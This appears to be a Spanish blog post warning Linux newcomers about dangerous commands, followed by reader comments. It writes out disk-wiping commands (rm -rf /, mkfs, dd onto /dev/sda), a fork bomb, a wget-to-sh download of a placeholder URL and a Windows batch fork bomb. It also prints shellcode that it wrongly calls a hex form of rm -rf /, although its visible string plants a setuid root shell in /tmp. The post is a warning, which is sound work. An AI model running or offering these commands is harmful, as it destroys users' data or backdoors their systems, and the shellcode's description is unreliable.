Linux tampoco esta libre de usuarios malintencionados y si eres nuevo en este entorno no esta de mas que conozcas estas cosas. Existen comandos que no es recomendable ejecutar en nuestro sistema o evitar ejecutar si estan contenidos dentro de shell scripts. Yo siempre digo que no hagais Copy & Paste al tuntun de comandos, o si os bajais algun script de un sitio que no conozcais, lo editeis al menos antes y echeis un vistazo a su contenido para evitar luego males mayores.
Algunos de estos comandos «peligrosos» son:
1. rm -rf /
Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendria a ser el equivalente (mas o menos) a un FORMAT C: en Windows.
2.
char esp[] __attribute__ ((section(«.text»))) /* e.s.p
release */
= «\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68»
«\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99»
«\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7»
«\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56»
«\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31»
«\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69»
«\x6e\x2f\x73\x68\x00\x2d\x63\x00»
«cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;»;
Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.
3. mkfs.ext3 /dev/sda
Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).
4. :(){:|:&};:
Conocido tambien como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.
5. cualquier_comando > /dev/sda
Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.
6. wget http://alguna_url -O- | sh
Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.
7. mv /home/tu_usuario/* /dev/null
Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).
Fuentes | Malogey y Deadly Linux Commands
Yo añado:
dd if=/dev/urandom of=/dev/sda
que lo que hace es una copia de datos brutos (raw) desde un origen (if) a un destino (of), si el destino es nuestro disco duro (/dev/sda) pues machacamos el contenido.
Malicioso != Destructivo.
Una expresión regular que coja /etc/passwd y busque usuarios sin contraseña me parece mucho más malicioso, aunque mucho menos destructivo, que casi todos los comandos aquí expuestos.
Pues quice utilizar el comando :(){:|:&};: y obtuve esto:
usuario@usuario-desktop:~$ sudo :(){:|:&};:
bash: syntax error near unexpected token `(‘
usuario@usuario-desktop:~$
valla que bien por la informacion.
alguien podria crear un virus informatico usando esos comandos.
jajaja.
@ Juan Carlos:
El comando seria este (o quizas unas \ mas):
:\(\){:|:&};:
Poniendo una \ en cada caracter que te marca como un error de sintaxis…
@Lycus
Bueno un virus no, pero si tal vez un script que un usuario se descargue de un sitio pensando que hace otra cosa y de golpe se quede sin sus archivos. Hay mucho «malandrin» por ahi suelto ^^
el desastre que provoca :(){ :|:& };: se puede corregir configurando limite de procesos por usuario en /etc/security/limits.conf
$ ulimit -a, para ver los limites actuales
editamos el /etc/security/limits.conf y agregamos/corregimos:
* hard nproc 1024
Una felicitacion para el blog, que siempre tiene algo interesante :).
Creo que el primer comando borra todo de todo, no solo el directorio root. Creo que paso de este comando por ahora (aunque cuando este delante del ordenador de alguien que me caiga mal… 🙂
y entonces para que existen? xDD que los dejen bloqueado o algo no se
de acuerdo con @TORA
un mensaje de confirmacion deberia estar presente.
«el siguiente comando BORRARA todo el sistema, estas seguro ?!!!!»
gran post
saludos
http://www.oxidoband.wordpress.com
bueno estos comandos existen pq si se usan bien son muy utiles.
p.ej «dd» te podria crear una copia exacta de un disco duro en otro disco duro.
el problema esta cuando se usan malamente.
No sé que tiene de mito y que de realidad. Pero una vez me tocó ir a un cliente que perdió uno de los nodos de un Sun Cluster, con Oracle y una BBDD rara rara rara (Tamino de SoftwareAG), las malas lenguas dicen que uno de los administradores ejecuto un «rm -rf *», probablemente desde el home del usuario root (que en Solaris si no lo cambias -y si no ha cambiado con versiones más recientes- es /).
Otras malas lenguas dicen que es por instalación de parches de Sun, a mí en alguna ocasión me dieron problemas majos, que ríete del SP2 de XP. Pero esta versión tenía menos guasa que la del rm :p.
Para todos estos «códigos» hace falta ser administrador o loguearse con sudo(o su) previamente.
Y yo cambiaría el título del post por «7 Comandos Destructivos para Linux …»
🙂 Saludos
> el problema esta cuando se usan malamente.
Bien dicho, Superpiwi
El cuchillo de por sí… no es malicioso, lo malicioso es lo que las personas pueden hacer con él 🙂
Respecto a lo que comentaba GaTTsU sobre
* hard nproc 1024
hay que proteger al usuario de sí mismo…
P.D. En Windows el usuario también podía fastidiarse si ejecutaba un .bat como:
:s
start %0
goto s
7 Comandos maliciosos para Linux (Nunca pero nunca los ejecutes)
via :https://ubuntulife.wordpress.com/
ejecute el rm -rf / en una maquina virtual con ubuntu y me dice que no se puede borrar la raiz incluso sin entrar en modo grafico y logueado como root no me borra nada
😦